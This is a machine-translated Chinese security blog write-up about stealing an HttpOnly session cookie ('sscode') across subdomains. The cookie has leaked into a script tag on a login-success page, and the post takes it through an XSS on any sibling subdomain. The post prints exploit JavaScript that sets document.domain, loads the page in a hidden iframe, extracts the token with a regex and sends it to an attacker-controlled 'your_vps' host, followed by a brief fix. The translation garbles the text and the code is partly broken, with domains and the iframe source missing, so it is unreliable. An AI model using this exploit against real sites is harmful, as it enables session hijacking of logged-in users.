Get httponly protected cookies across sub domains through XSS

Xiaoxiang Xin'an 2022-06-24 07:30:43 阅读数:426


Statement : Most of the official account is from the author's daily notes. , A few articles are also reproduced by authorship of the original author and other official account. , unaccredited , It is strictly prohibited to reprint , If you want to reprint , Contact and talk . Do not use the related technology in the article to engage in illegal testing , Any adverse consequences arising from this are not related to the author and the official account. .

0x01 Introduce

Trans subdomain :

Because of the browser homology policy , Only the same agreement 、 domain name 、 Port pages can interact with each other , Otherwise, it will be rejected by the browser . There are two pages , Respectively and, The two pages are different domain names , No interaction , But you can Use the following code to set up the same domain , In this way, a cross domain interaction can be realized .



In short, it's for Cookie Add a layer of protection ,document.cookie The settings will not be returned HttpOnly Of Cookie.

0x02 Vulnerability details

First, through F12 Check out the key Cookie sscode Set up HttpOnly.

So this sscode The server must send it to the client after logging in , Then go through the login process to see if there are any defects .

Enter the account and password and click login

adopt Set-Cookie Send to the client sscode

Go to login success page

Notice that another packet was sent after this , There is sscode( This figure is the repaired ,sscode Encrypted )

Where did this request come from ? Notice the... In the request header Referer.


From the login success page , No, X-Requested-With head , Then it should be through some html Labeled src Request from attribute value , Go to the successful login page to confirm .

Search for sscode Locate this script label , It can be seen that it is really through src Request from attribute value .

Then you can use the same domain Xss Vulnerability to get the response content of the login page , And then extract the sscode.

The login page is the following link

At first, the domain name is, I want to find one Of Xss That's all right. , But I couldn't find it after looking around . Later use document.domain The domain to which the login success page belongs is, That means you can pass through any subdomain Xss To cross subdomains HttpOnly The protection of sscode.

By searching the syntax Find a place Xss, To write exp as follows .

document.domain = ''; // Set the same domain
var iframe = document.createElement("iframe");
iframe.src = "";"width:0%;height:0%;"; // Settings are not visible High concealment
iframe.onload = function(){
var content = iframe.contentDocument || iframe.contentWindow.document; // obtain iframe Content of page
var scr = content.getElementsByTagName('script'); // Get all of it script label
var str = scr[3].src; // belt sscode Of script label
var re = /%22sscode%22%3A%22(.+)%22%2C%22cookie_expire/; // Regular expressions
var sscode = str.match(re)[1]; // Get sscode
var image = new Image();
image.src = 'http://your_vps/' + '?sscode=' + sscode; // take sscode Transmit it out

Finally through Xss Load the written malicious Js file , Send a link to the victim , As long as it is logged in , Open the link sscode Will be stolen .

0x03 Repair plan

The root cause of this loophole lies in sscode It was leaked to the successful login page , The best fix, of course, is not to reveal it on the page , Because of the business needs of the manufacturer , You can't leave it on the page , The fix is to encrypt it .

Source of the article :CSDN Blog , Original address :

copyright:author[Xiaoxiang Xin'an],Please bring the original link to reprint, thank you.